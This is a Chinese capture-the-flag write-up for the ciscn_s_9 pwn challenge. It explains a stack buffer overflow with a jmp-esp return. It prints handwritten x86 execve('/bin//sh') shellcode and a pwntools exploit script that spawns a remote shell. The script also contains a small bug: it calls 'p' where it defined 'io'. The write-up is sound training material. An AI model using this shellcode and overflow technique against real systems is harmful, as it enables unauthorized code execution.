采用汇编手写shellcode写入栈解题ciscn_s_9

pwntools工具生成的shellcode一般是70到100字节左右,采用shellocde = asm(shellcraft.sh())

而当缓冲区溢出的空间太少以至于自动生成的sc不能正常衔接ebp与返回地址时,需要手写shellocde填入缓冲区构造新的栈帧。
书写shellcode参考学习链接:

linux上的shellcode写法(pwntools,手写shell)_pwntools生成shellcode-CSDN博客

1.检查文件类型,32位,NX保护未打开。查看函数主要在pwn()部分,利用缓冲区读入的s溢出点,布局构造新的栈帧分布。

cs 复制代码
#main函数
int pwn()
{
  char s[24]; // [esp+8h] [ebp-20h]

  puts("\nHey! ^_^");
  puts("\nIt's nice to meet you");
  puts("\nDo you have anything to tell?");
  puts(">");
  fflush(stdout);
  fgets(s, 50, stdin);
  puts("OK bye~");
  fflush(stdout);
  return 1;
}

ida中还有hint函数,按tap键进入汇编窗口,代码如下:

cs 复制代码
push    ebp       #压入ebp
mov     ebp, esp  #将ebp的值赋予esp,及更新函数基址地址
jmp     esp       #跳转到当前函数的esp

它的作用是保存当前函数的调用者的栈帧指针(ebp),然后将当前栈指针(esp)赋值给ebp,最后通过跳转指令(jmp esp)将控制流转移到当前栈指针所指向的位置。也就是说创建了一个新的栈帧,将当前函数的栈指针设置为新的栈帧指针。利用此jmp esp的地址0x08048554作为返回地址。

2.接下来主要看栈的内部分配,已知s的输入点距离ebp为20h,加上ebp的4字节大小,共需要填充24h的shellcode(大小比这小,不够填充字节),再接上ret_addr,此时还未结束。

因为执行pop ebp 把esp栈顶的值给ebp,esp加4h,执行ret,即pop eip,把修改后的返回地址 0x08048554给eip,esp加4h,此时esp距离s是28h(有点昏,参考其他文章),原先的20h(s的缓冲区已经不够,需要增加8h的大小)需要扩充,利用sub esp,0x28;call esp结束跳转到esp,参考上图完成shellcode的写入。

汇编下的shellcode,一般得到shell都是传入"bin/sh"字符,x86下的shellcode如下:

bash 复制代码
xor eax,eax            #异或使得eax为0
xor ebx,ebx            #异或使得ebx为0
xor edx,edx            #异或使得edx为0
xor ecx,ecx            #异或使得ecx为0
push edx               #压入edx
push 0x68732f2f        #压入//sh
push 0x6e69622f        #压入/bin
mov ebx,esp            #让ebx指向esp
mov al,0xB             #给al赋值0xb
int 0x80               #执行0x80

说明:

1.小端序下的bin/sh的ASCⅡ代码反过来输入,如"h"的ASCⅡ代码为0x68,"s"为0x73,"/"为0x2f。(输入//sh的原因是为了填充满4个字节,/bin/sh和/bin//sh等同)

2.al为eax寄存器的低8位,0xb是execve的系统调用号。(之前文章记载)

wp如下:欢迎各位师傅指正!

python 复制代码
from pwn import *

io = remote('nodeX.buuoj.cn',XXXX)
#io = process('./ciscn_s_9')
context(log_level='debug',arch='i386',os='linux')

jump_esp=0x08048554

shellcode='''
xor eax,eax
xor edx,edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
mov al,0xB
int 0x80
'''

shellcode=asm(shellcode)

payload=shellcode.ljust(0x24,b'\x00')+p32(jump_esp)


payload+=asm("sub esp,40;call esp")

p.sendline(payload)
p.interactive()
相关推荐
Koi慢热1 分钟前
路由基础(全)
linux·网络·网络协议·安全
传而习乎11 分钟前
Linux:CentOS 7 解压 7zip 压缩的文件
linux·运维·centos
soulteary13 分钟前
突破内存限制:Mac Mini M2 服务器化实践指南
运维·服务器·redis·macos·arm·pika
我们的五年21 分钟前
【Linux课程学习】:进程程序替换,execl,execv,execlp,execvp,execve,execle,execvpe函数
linux·c++·学习
好看资源平台40 分钟前
网络爬虫——综合实战项目:多平台房源信息采集与分析系统
爬虫·python
IT果果日记42 分钟前
ubuntu 安装 conda
linux·ubuntu·conda
Python私教1 小时前
ubuntu搭建k8s环境详细教程
linux·ubuntu·kubernetes
羑悻的小杀马特1 小时前
环境变量简介
linux
进击的六角龙1 小时前
深入浅出:使用Python调用API实现智能天气预报
开发语言·python
檀越剑指大厂1 小时前
【Python系列】浅析 Python 中的字典更新与应用场景
开发语言·python